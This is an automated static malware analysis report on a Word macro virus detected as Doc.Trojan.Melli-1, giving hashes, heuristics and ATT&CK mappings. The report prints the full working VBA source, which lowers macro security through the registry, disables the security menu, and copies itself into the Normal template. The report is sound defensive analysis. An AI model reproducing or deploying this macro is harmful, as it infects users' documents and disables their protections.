Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a67ab6dfaed850a9…

MALICIOUS

Office (OLE)

27.5 KB Created: 1980-01-11 05:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dcce6b5a8d20305602b2763443108809 SHA-1: 962466a581a7fddf9e2912dc72f2458d53140b38 SHA-256: a67ab6dfaed850a9c58e9c2ff3ef8b7b911915ef7a46c9e3619327e24d772813
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Microsoft Word document containing VBA macros. The AutoOpen macro attempts to lower macro security settings and exports a VBA component named 'Melli' to 'c:\Melli.dll'. This action suggests the document is a dropper or part of a multi-stage attack, aiming to execute further malicious code.

Heuristics 4

  • ClamAV: Doc.Trojan.Melli-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melli-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1605 bytes
SHA-256: ad0cf5d43cb2d915a39867e3237302845e4e1201c8efbf7371cd7cf704a6b303
Detection
ClamAV: Doc.Trojan.Melli-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Melli"
Sub AutoOpen()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = False
End If
If NormalTemplate.VBProject.VBComponents.Item("Melli").Name <> "Melli" Then
NotInNorm = True
ActiveDocument.VBProject.VBComponents("Melli").Export "c:\Melli.dll"
Set Dobj = NormalTemplate.VBProject
ElseIf ActiveDocument.VBProject.VBComponents.Item("Melli").Name <> "Melli" Then
NotInActiv = True
NormalTemplate.VBProject.VBComponents("Melli").Export "c:\Melli.dll"
Set Dobj = ActiveDocument.VBProject
End If
If NotInNorm = True Or NotInActiv = True Then Dobj.VBComponents.Import ("c:\Melli.dll")
If NotInActiv = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument

If Day(Now()) = 11 And Month(Now()) = 9 Then
    AutoCorrect.Entries.Add Name:="and", Value:="Melli"
    AutoCorrect.ReplaceText = True
 End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.